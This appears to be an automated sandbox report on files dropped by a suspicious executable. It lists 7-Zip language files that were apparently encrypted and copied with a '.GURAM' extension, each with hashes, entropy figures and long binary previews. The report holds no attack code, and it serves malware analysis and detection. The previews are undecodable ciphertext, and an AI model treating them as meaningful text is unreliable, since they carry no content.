                                                                                                                                                                                                                                                Preview:T)..L....M<o..G.a..2P.....do..Q,..A..f.8P..9.F...d#..R. @.d...T........l.....R...2x.....,R(.,.(.!........j^..]..8L..i.......l.W.".}X...e.].CV;.J|..0...a.]@.........Yn..:...=Y;..*.b..c.....H...h5*.....np....`..@...I.b..;....7...._d5b...r.F.3.8.@..,a.{u$.......E.4Mdm}1|..f...3......`...b;...3$...4..zE.._..VG2O....... >..K.9....>....m@).I.....|V.....wLe............@s..M../...:......P.A.s.'%..S..^c|..m56...s+...A....)..O.Soa...`.P...?cO..z...,....O.#.-&v....w~G.)w..g.........+-H..&v4......+6.z*Z.:PO.H.uM.8{s....A...Q&...j.{..YK#.,J ..._..\......+q.1'..9.....uvX.:.A.My_.C29...V...(>..=.xB.'..K.D...l<...>B.l.Km.c.Z.@$.B?.....5...O..gp..^~u}..w...........>-..y...pM....:.}.r.\....E.d..By..ZSz.c..........{m....@..v3...... ..:HR........F%.Z..[.n.z.8.......@.. 6...6......^...8.9....D/....\7JGve.m...+RF2.&.g...t.I..){.........K.j.w.|.wI4..[q..5..y...oP..q)@Z...xP.I.+...e...y...W-.....PD|..9..7'...F....,R.Ee~......(9d...ua._..9...........P.7...G.@&.q

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\ug.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):11994
                                                                                                                                                                                                                                                Entropy (8bit):7.984197046859827
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:65ZSrtenbNfPAs59xvaDlpk3rTI1CmoI8zmBkb5VJf+5SO8xbvEeuWbnKWIu4MUr:KZSr8Hx9FGevI8moI8z1/Ncj8t0W+hug
                                                                                                                                                                                                                                                MD5:36DBA2B6BAFF822E716C1AB51E47B62F
                                                                                                                                                                                                                                                SHA1:3533C994BE1590533A10EAD3F05E68F2C5AF3BEE
                                                                                                                                                                                                                                                SHA-256:49A635482D610771FACE68A74E1B3709B3279AD6B5140E072E2529CF429C96F8
                                                                                                                                                                                                                                                SHA-512:9398ACC8761102EB65D94C5DAAB9584BBF3CB1C9333BF50D99F5C66A5F40402BEC151D89B578981E7CDD3AC3C56EA98929A63B0A8F1E6CC019FB54C1A4520235
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:T)..L....M<o..G.a..2P.....do..Q,..A..f.8P..9.F...d#..R. @.d...T........l.....R...2x.....,R(.,.(.!........j^..]..8L..i.......l.W.".}X...e.].CV;.J|..0...a.]@.........Yn..:...=Y;..*.b..c.....H...h5*.....np....`..@...I.b..;....7...._d5b...r.F.3.8.@..,a.{u$.......E.4Mdm}1|..f...3......`...b;...3$...4..zE.._..VG2O....... >..K.9....>....m@).I.....|V.....wLe............@s..M../...:......P.A.s.'%..S..^c|..m56...s+...A....)..O.Soa...`.P...?cO..z...,....O.#.-&v....w~G.)w..g.........+-H..&v4......+6.z*Z.:PO.H.uM.8{s....A...Q&...j.{..YK#.,J ..._..\......+q.1'..9.....uvX.:.A.My_.C29...V...(>..=.xB.'..K.D...l<...>B.l.Km.c.Z.@$.B?.....5...O..gp..^~u}..w...........>-..y...pM....:.}.r.\....E.d..By..ZSz.c..........{m....@..v3...... ..:HR........F%.Z..[.n.z.8.......@.. 6...6......^...8.9....D/....\7JGve.m...+RF2.&.g...t.I..){.........K.j.w.|.wI4..[q..5..y...oP..q)@Z...xP.I.+...e...y...W-.....PD|..9..7'...F....,R.Ee~......(9d...ua._..9...........P.7...G.@&.q

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\uk.txt

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):16370
                                                                                                                                                                                                                                                Entropy (8bit):7.988230646205005
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:384:5zcO/TW5ORPEAVf9Z+E8gXg9Fsy7NRfBVQBPhlo:+ETLHVFn8gXgrsoVino
                                                                                                                                                                                                                                                MD5:D962159D0DD340AC34336B1DDD74961D
                                                                                                                                                                                                                                                SHA1:51CF639B0BEC528BBA29F8CF92570BF5D8F43611
                                                                                                                                                                                                                                                SHA-256:A6FFF1B61D8816351B2ED6CC33B39BE55C6ECA9806AA0CDA6946B0032AF654A9
                                                                                                                                                                                                                                                SHA-512:C55A73995374EE513CBCC7B93715FACB654F081C9072CAF8D5578EC1ED360317A17B1C15E81006BBFF125A89646B63E8A89AA336C85175C234127A547679B1B3
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:3..b.(..m.....;6.#.....,..5..a..O{J.3>.3oa>T......'...Z.8Z,.,R`.-.8W.>...~.Yne.......U.....o..w.G.t.&,....d....}..b...0.qxc.N.....9..B...Q.>.$..f\\ejw.C....B....."......p3.m.`....u.7.....+.Z..~..1B.D(B..[`...|.\e.?....^.....6,~..Y.5.^...4.%ZTo305aX$.C.'......p/......fBq...Op|.......F.v...$........]>h..1....eo9.....p.l...}..r.m./....6.{<<h...YA@+.`N....)*>......T2=.D...W...8.hw.).N................i...`.TpM.E.Z.C..yy.W.O....U.mY.p...r...f......C.|.Z@.,....z..p....P&.S..k6c.....95.}x.l}.a.).$o..<.Y.R.\..0.3......O.....FF.K.......Y.X...kp...|..m.B9......%'0....1.@+...mh.-..i.(0...C...T4..}......R...-.\......{&4M.E.y.u.W.4.g.$`.0...3G......&.#C...6.R.....S.5..%8.3...$.3...g.L......X....V....q..t.jB.$....?~..F.m...w.......c....h,o..1V.z.........y.Dj.. ...v..&.:4..9Z...._g.\9.@G'B..Y...S.U.2......3..B...~.....0...9.a.)W..\|.q..o'.#AB*.5G.v.'.!H...,gv...........y.2.(.`.oQ4W....LG\..I...Um..5sY.b:..|..%-.H..`).pU#&S.[.81).....W....2

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\uk.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):16370
                                                                                                                                                                                                                                                Entropy (8bit):7.988230646205005
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:384:5zcO/TW5ORPEAVf9Z+E8gXg9Fsy7NRfBVQBPhlo:+ETLHVFn8gXgrsoVino
                                                                                                                                                                                                                                                MD5:D962159D0DD340AC34336B1DDD74961D
                                                                                                                                                                                                                                                SHA1:51CF639B0BEC528BBA29F8CF92570BF5D8F43611
                                                                                                                                                                                                                                                SHA-256:A6FFF1B61D8816351B2ED6CC33B39BE55C6ECA9806AA0CDA6946B0032AF654A9
                                                                                                                                                                                                                                                SHA-512:C55A73995374EE513CBCC7B93715FACB654F081C9072CAF8D5578EC1ED360317A17B1C15E81006BBFF125A89646B63E8A89AA336C85175C234127A547679B1B3
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:3..b.(..m.....;6.#.....,..5..a..O{J.3>.3oa>T......'...Z.8Z,.,R`.-.8W.>...~.Yne.......U.....o..w.G.t.&,....d....}..b...0.qxc.N.....9..B...Q.>.$..f\\ejw.C....B....."......p3.m.`....u.7.....+.Z..~..1B.D(B..[`...|.\e.?....^.....6,~..Y.5.^...4.%ZTo305aX$.C.'......p/......fBq...Op|.......F.v...$........]>h..1....eo9.....p.l...}..r.m./....6.{<<h...YA@+.`N....)*>......T2=.D...W...8.hw.).N................i...`.TpM.E.Z.C..yy.W.O....U.mY.p...r...f......C.|.Z@.,....z..p....P&.S..k6c.....95.}x.l}.a.).$o..<.Y.R.\..0.3......O.....FF.K.......Y.X...kp...|..m.B9......%'0....1.@+...mh.-..i.(0...C...T4..}......R...-.\......{&4M.E.y.u.W.4.g.$`.0...3G......&.#C...6.R.....S.5..%8.3...$.3...g.L......X....V....q..t.jB.$....?~..F.m...w.......c....h,o..1V.z.........y.Dj.. ...v..&.:4..9Z...._g.\9.@G'B..Y...S.U.2......3..B...~.....0...9.a.)W..\|.q..o'.#AB*.5G.v.'.!H...,gv...........y.2.(.`.oQ4W....LG\..I...Um..5sY.b:..|..%-.H..`).pU#&S.[.81).....W....2

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\uz-cyrl.txt

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):15775
                                                                                                                                                                                                                                                Entropy (8bit):7.987826054512055
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:384:vBy3B8/JsJeiB3Kfu3PEmuit79jY58AU3RfiO9sXasj4aTC6x3u:JV/JsJH58muinfAciO2BNtu
                                                                                                                                                                                                                                                MD5:8F3BDE003F38C7ABA5C37BCBF9DC5AD0
                                                                                                                                                                                                                                                SHA1:FE0F2A27CE22101775616C2376D7073A9A788D66
                                                                                                                                                                                                                                                SHA-256:B96B8852A11BF307236BB55100BE854F6BF2FAAA6A362DA8BB3F988CC90BCFF0
                                                                                                                                                                                                                                                SHA-512:C7B2450CE26806E5E0F094A730EABAAA6B939832478FFDA84BF12FFD76B6AB6F263CC7669FDB3913AF663079D00F212CEA4F9361832B59D0367648CAB4124346
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:....<......I.o.L....m.....z.....I>.x.^:.6.........k..*2.....Z.|R$..JeJ..\..\..P)..x...[W;<....jK\....E{....o. .^....s[y......lsc..z.... .I..pI..:+..Q...:X.i.................gPoR.....m,.(R..:..M.*~{.].p~....~....._T..Hz..g. ]...\$.7.A ..:...3.D..B....H.:...K...*m]-.!.....H...j.W.....)p)...t.u.o~..b.7.XN........B.FA...P.....^..m/..~a.z.[.G...F.m.....%.........T\....9.....K.g..0J-qthq.....1..s.@..+.*@m.[P..%...(..ni.l..3...h~..hF.......Z..]....I(...#d....1.{...q.;.M...K.R......'Q....}!Y....v.Z:LM. .W)^P.#L4.s.......]..X.m..(^....!...._..G%.\x.U.8.}...B.}..A(..GWF....r...H....<.;D.ik~.....x..s.1....7-_,..O.F....@1..I.+z..]....H...>..d....K...N....R..n....-.U.......N..r...j2(.R...*A.O.u...h......C...n.2,...}&7&V.V.{hE?/n%.Q.+.w.w\b.@.`...hf.5S*.f...VF.......5x.ti*e.l..:...<Sy....$..N^........P.......R....wG..H.r....+..v.aYZ.]}..qy....W.z.p.?sW.q.....%yu@xG.]..L.;...<.].-.!..=..Q.w..zJ......;....p.U....v.b.:...b.#>I.b...e.Y.`TK....;M....>.".-...A@

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\uz-cyrl.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):15775
                                                                                                                                                                                                                                                Entropy (8bit):7.987826054512055
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:384:vBy3B8/JsJeiB3Kfu3PEmuit79jY58AU3RfiO9sXasj4aTC6x3u:JV/JsJH58muinfAciO2BNtu
                                                                                                                                                                                                                                                MD5:8F3BDE003F38C7ABA5C37BCBF9DC5AD0
                                                                                                                                                                                                                                                SHA1:FE0F2A27CE22101775616C2376D7073A9A788D66
                                                                                                                                                                                                                                                SHA-256:B96B8852A11BF307236BB55100BE854F6BF2FAAA6A362DA8BB3F988CC90BCFF0
                                                                                                                                                                                                                                                SHA-512:C7B2450CE26806E5E0F094A730EABAAA6B939832478FFDA84BF12FFD76B6AB6F263CC7669FDB3913AF663079D00F212CEA4F9361832B59D0367648CAB4124346
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:....<......I.o.L....m.....z.....I>.x.^:.6.........k..*2.....Z.|R$..JeJ..\..\..P)..x...[W;<....jK\....E{....o. .^....s[y......lsc..z.... .I..pI..:+..Q...:X.i.................gPoR.....m,.(R..:..M.*~{.].p~....~....._T..Hz..g. ]...\$.7.A ..:...3.D..B....H.:...K...*m]-.!.....H...j.W.....)p)...t.u.o~..b.7.XN........B.FA...P.....^..m/..~a.z.[.G...F.m.....%.........T\....9.....K.g..0J-qthq.....1..s.@..+.*@m.[P..%...(..ni.l..3...h~..hF.......Z..]....I(...#d....1.{...q.;.M...K.R......'Q....}!Y....v.Z:LM. .W)^P.#L4.s.......]..X.m..(^....!...._..G%.\x.U.8.}...B.}..A(..GWF....r...H....<.;D.ik~.....x..s.1....7-_,..O.F....@1..I.+z..]....H...>..d....K...N....R..n....-.U.......N..r...j2(.R...*A.O.u...h......C...n.2,...}&7&V.V.{hE?/n%.Q.+.w.w\b.@.`...hf.5S*.f...VF.......5x.ti*e.l..:...<Sy....$..N^........P.......R....wG..H.r....+..v.aYZ.]}..qy....W.z.p.?sW.q.....%yu@xG.]..L.;...<.].-.!..=..Q.w..zJ......;....p.U....v.b.:...b.#>I.b...e.Y.`TK....;M....>.".-...A@

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\uz.txt

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):9991
                                                                                                                                                                                                                                                Entropy (8bit):7.981699360899414
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:4gGUbfKgqlDR4MOZwqS2MhLvp7ItF4p1cG2JQ//uq6gcZ3ZMLZU3:4gGyCgxMlL2MhLvp0tGpqGKgcQO3
                                                                                                                                                                                                                                                MD5:2BCF4F55FD2D1B63EAA63FE58E7139EB
                                                                                                                                                                                                                                                SHA1:1D782F08D0A8CC0E78C277E68C34B6A9D2CF87F8
                                                                                                                                                                                                                                                SHA-256:750133BD2A196EBFDF9108124DB1BC5911FD3652BAA52DF2C672037F20B563D5
                                                                                                                                                                                                                                                SHA-512:3D81D7AEDAF7AEC5F0153F864A2DD8D12FA4F3FC9E81086D0FD84CE79580FD40E183F2B801687797DF932F43B7E5039D878160B75D8A054D6F470C9018D258CC
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:1.U...]...f[...-....x...kA.:....#...,ks....o.&.b.]...o..)xJ..A.....T2.=bT...,.T...A.....Q?.LB.|....6r....|.oi...p........7;.d.....;..QV....."C!P.9#]x.}..!.%.L...c..&:..?.'.n.S.K....)...>.E,}f.p...9.d.mxh.;.4.%.....A!.f.|..M.......U&@.1....[.`+*.....c...Q~....ys..:...x..F...:=...,......4...j.]...v.v.C,w..K2i{.57#.cr.@..)..n.T..a...0Z.5K.Q:E.4.....}>ka<o....4.ROh>5iW+...k:.g'.2.6[POwWjI.a.#6.6k..D>.B.DnJY....\B....S62i9.3n$|4U...VY5H.@=....~.[E;...(uwCV8pq..C-...%.......(....=.#p...V..z.y...k..A5.S..J....].$.....5....f..p5.....'.+J..,.H.`..sPA.C...\.s......K`....R6PH.eQ..PPx0g5 .k.|..._.3@...$...%{.e(.....$..24[.OF...CW-...X........l+..wx|P>.t...j4f..,.1o...Y...8&...-...`|g..linT.........^....~a.X..Q.R...y..cy.VBPz.d....t..5...@..AD..'....2.8j..j...*...pO...../..d.....&(....E...s'r2S..".@{..}.5.OA....ur.$ .....FS....{..?...I...(5.=.!.....$.#Y..u-.lT...}..w.....:.....}.q.N.S..x4G.=.W..N .p...F..q.....T.5......'?.._9..48.zJ./..T..P_=aT.P.x........O

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\uz.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):9991
                                                                                                                                                                                                                                                Entropy (8bit):7.981699360899414
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:4gGUbfKgqlDR4MOZwqS2MhLvp7ItF4p1cG2JQ//uq6gcZ3ZMLZU3:4gGyCgxMlL2MhLvp0tGpqGKgcQO3
                                                                                                                                                                                                                                                MD5:2BCF4F55FD2D1B63EAA63FE58E7139EB
                                                                                                                                                                                                                                                SHA1:1D782F08D0A8CC0E78C277E68C34B6A9D2CF87F8
                                                                                                                                                                                                                                                SHA-256:750133BD2A196EBFDF9108124DB1BC5911FD3652BAA52DF2C672037F20B563D5
                                                                                                                                                                                                                                                SHA-512:3D81D7AEDAF7AEC5F0153F864A2DD8D12FA4F3FC9E81086D0FD84CE79580FD40E183F2B801687797DF932F43B7E5039D878160B75D8A054D6F470C9018D258CC
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:1.U...]...f[...-....x...kA.:....#...,ks....o.&.b.]...o..)xJ..A.....T2.=bT...,.T...A.....Q?.LB.|....6r....|.oi...p........7;.d.....;..QV....."C!P.9#]x.}..!.%.L...c..&:..?.'.n.S.K....)...>.E,}f.p...9.d.mxh.;.4.%.....A!.f.|..M.......U&@.1....[.`+*.....c...Q~....ys..:...x..F...:=...,......4...j.]...v.v.C,w..K2i{.57#.cr.@..)..n.T..a...0Z.5K.Q:E.4.....}>ka<o....4.ROh>5iW+...k:.g'.2.6[POwWjI.a.#6.6k..D>.B.DnJY....\B....S62i9.3n$|4U...VY5H.@=....~.[E;...(uwCV8pq..C-...%.......(....=.#p...V..z.y...k..A5.S..J....].$.....5....f..p5.....'.+J..,.H.`..sPA.C...\.s......K`....R6PH.eQ..PPx0g5 .k.|..._.3@...$...%{.e(.....$..24[.OF...CW-...X........l+..wx|P>.t...j4f..,.1o...Y...8&...-...`|g..linT.........^....~a.X..Q.R...y..cy.VBPz.d....t..5...@..AD..'....2.8j..j...*...pO...../..d.....&(....E...s'r2S..".@{..}.5.OA....ur.$ .....FS....{..?...I...(5.=.!.....$.#Y..u-.lT...}..w.....:.....}.q.N.S..x4G.=.W..N .p...F..q.....T.5......'?.._9..48.zJ./..T..P_=aT.P.x........O

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\va.txt

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):7030
                                                                                                                                                                                                                                                Entropy (8bit):7.972717220435403
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:96:BoSPxMPQGsODKvyupVXbDAm458cVHTdAyj4yIFf5XW1NjqCB9aIDZ711psBFale+:BlPxMlJDjYVnAmBiHTKhf5XqjD97bU+
                                                                                                                                                                                                                                                MD5:5EAE747F6C2539AD393D66896FFFCD23
                                                                                                                                                                                                                                                SHA1:ED8B49A17F7AA54E9A1C84A07F0A102F3D56D11E
                                                                                                                                                                                                                                                SHA-256:F15630AA3849D951A1F3F606FEEBD41609B643BDB5A2905FED0ECFFDA0F595FD
                                                                                                                                                                                                                                                SHA-512:4362CFB889A47F0E90FD2A4C34C7BDC18020AEFE31434333D80F7832FA7553F974EA4F7D337634B4D1BF2D027EEC6C245E39E90E3D8D0700F0C373285D0C3449
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.ENdR..JU..HY..v...z..y._.&v"....>G#.9-1.S.....<6...B.jLX..c0.....Z....&^z.......e.41...UV.4....<..]U......PA..\......'..#N8[.....M..'.....".....!.$.!.V^z...B.{9........".b.?....].X.n...*..[.v...C..a.......o3..F}MK.y..NI..2ft.n.G._.X3...g.<........&..-..K..9...Z..vJ.[...&....N.`t....c..DB..|.... \........~...... .Z{......o.!...F..!...qJ".v)V'F..[wr...K.\...'....qa.....|.Z..^.n...2=....an.se.mt[...Z.j..z>7.$....b...h...[.o@H.....;..../..+..v.O.r.@.@.._......X8.L..j..2.....o......2 ..$t....}........4....j..=.6..`.....`.......B...@..'v!...R..9.,..g....I..roS.%..g....C.z.h...VU..LyS...{2..T.f.+.B..Q."_NT.C.......|.J.u.........1dteEI.1..d...p..m.d.oQk...m..4..4g...f%~..vy.......%...x9..^8.c..t...s.....v.&C.. ..8..nq~.q..vQ..7.g.4...(.V}..6ff<1..>...+....}.^t....z.....5...o<.(4..j. J....D..........i...x.../...#.$.P.Z3KZ..0Ht....CD..........7.d.g.}78%.ay.5..bug&.Q....N..h.T..D....&r.SG.>.......q.%.iU..`. ..5(..i...om76T.<.j.;(.....W...6..kK.Z=...

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\va.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):7030
                                                                                                                                                                                                                                                Entropy (8bit):7.972717220435403
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:96:BoSPxMPQGsODKvyupVXbDAm458cVHTdAyj4yIFf5XW1NjqCB9aIDZ711psBFale+:BlPxMlJDjYVnAmBiHTKhf5XqjD97bU+
                                                                                                                                                                                                                                                MD5:5EAE747F6C2539AD393D66896FFFCD23
                                                                                                                                                                                                                                                SHA1:ED8B49A17F7AA54E9A1C84A07F0A102F3D56D11E
                                                                                                                                                                                                                                                SHA-256:F15630AA3849D951A1F3F606FEEBD41609B643BDB5A2905FED0ECFFDA0F595FD
                                                                                                                                                                                                                                                SHA-512:4362CFB889A47F0E90FD2A4C34C7BDC18020AEFE31434333D80F7832FA7553F974EA4F7D337634B4D1BF2D027EEC6C245E39E90E3D8D0700F0C373285D0C3449
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.ENdR..JU..HY..v...z..y._.&v"....>G#.9-1.S.....<6...B.jLX..c0.....Z....&^z.......e.41...UV.4....<..]U......PA..\......'..#N8[.....M..'.....".....!.$.!.V^z...B.{9........".b.?....].X.n...*..[.v...C..a.......o3..F}MK.y..NI..2ft.n.G._.X3...g.<........&..-..K..9...Z..vJ.[...&....N.`t....c..DB..|.... \........~...... .Z{......o.!...F..!...qJ".v)V'F..[wr...K.\...'....qa.....|.Z..^.n...2=....an.se.mt[...Z.j..z>7.$....b...h...[.o@H.....;..../..+..v.O.r.@.@.._......X8.L..j..2.....o......2 ..$t....}........4....j..=.6..`.....`.......B...@..'v!...R..9.,..g....I..roS.%..g....C.z.h...VU..LyS...{2..T.f.+.B..Q."_NT.C.......|.J.u.........1dteEI.1..d...p..m.d.oQk...m..4..4g...f%~..vy.......%...x9..^8.c..t...s.....v.&C.. ..8..nq~.q..vQ..7.g.4...(.V}..6ff<1..>...+....}.^t....z.....5...o<.(4..j. J....D..........i...x.../...#.$.P.Z3KZ..0Ht....CD..........7.d.g.}78%.ay.5..bug&.Q....N..h.T..D....&r.SG.>.......q.%.iU..`. ..5(..i...om76T.<.j.;(.....W...6..kK.Z=...

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\vi.txt

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):9123
                                                                                                                                                                                                                                                Entropy (8bit):7.980130403220372
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:jhYjvGBbZzaqeLcdXoVdjMvWDwVC3XYhFalXAzFWAR1sLSCWzKXuRjUI:1YjvGBb3meXoU+DwVGkalqROLSZzKKAI
                                                                                                                                                                                                                                                MD5:176954BEABAB45B58325FA339FD3F0EF
                                                                                                                                                                                                                                                SHA1:785C3FF2AF7B815812C09F86A85156D44B86092B
                                                                                                                                                                                                                                                SHA-256:15700D4B8E53949E072F1F7563657B627F7281126ACF0F5FC11B06AD6A79D3B4
                                                                                                                                                                                                                                                SHA-512:2882CF1BA078041C3968AEC11A5ECB77B419245FCD7053F912812872688F0134A90CCDAFA09AA2CB7331FB8D1390E3B34D9FB21D0A067F507CB2ADF6DF9CB405
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.%.%mOVP!v..{....<.X...X...th..}..hL.R3rFX..s..t...O.S-~.K....d.j...M..].6Gr......N..\.KS.L..j.p...u...G.6*?..W.lwN..]p..6l..zL....@|...0.?mS;.i.w........f..^...{.c*....$..."..HWr.....\p!=.I$.RM...e..H.K.).P....[j.1).n...O.f....K7..h.M...@.(....u..u..+Y..Pr~.@..V0.cg9...K&`&.E....?QkZ#Qik...m5z6xD...u.p.3.{.%..nTox..(k>.y.dC.....67...#...`.8.1...EtF.....A~...&.q...J.,4D.....J4...6f...5T@D....OUZc.:..E..6..D..[.;.f../i...iL....'......u.x.-k.q....#H..n..4..s..jv.Dx...L....x...&..........>.....R$F..l)M...x..$.R2...U.#.j...a..u$.{.Z..Q.r...`...I..~..?.<w...X.v...e..K$'.SR,..r.p..z P3.Pg..D^.d.-.q..N...8...<l7..=...*.zE.\.........s.j.....!n44....&.a....i..r.x.N.........|x.9.vKC..MO.......Cj..._.rW.Q{.J.X......LM).J....7...x...J.I......../k..j...U...#.9......'...W..Ic.[.D&....E0..!e.....\{....&j.\.Q4H...u.X....<V.7..(..V....h 3...X.o.`.....F.>j@.>\........ki..-...q.....^.F..-.....2...4.-.3.@$...X4.......;d.k...AyAh4.d.d.NA.rU...S.......d...A...

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\vi.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):9123
                                                                                                                                                                                                                                                Entropy (8bit):7.980130403220372
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:jhYjvGBbZzaqeLcdXoVdjMvWDwVC3XYhFalXAzFWAR1sLSCWzKXuRjUI:1YjvGBb3meXoU+DwVGkalqROLSZzKKAI
                                                                                                                                                                                                                                                MD5:176954BEABAB45B58325FA339FD3F0EF
                                                                                                                                                                                                                                                SHA1:785C3FF2AF7B815812C09F86A85156D44B86092B
                                                                                                                                                                                                                                                SHA-256:15700D4B8E53949E072F1F7563657B627F7281126ACF0F5FC11B06AD6A79D3B4
                                                                                                                                                                                                                                                SHA-512:2882CF1BA078041C3968AEC11A5ECB77B419245FCD7053F912812872688F0134A90CCDAFA09AA2CB7331FB8D1390E3B34D9FB21D0A067F507CB2ADF6DF9CB405
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
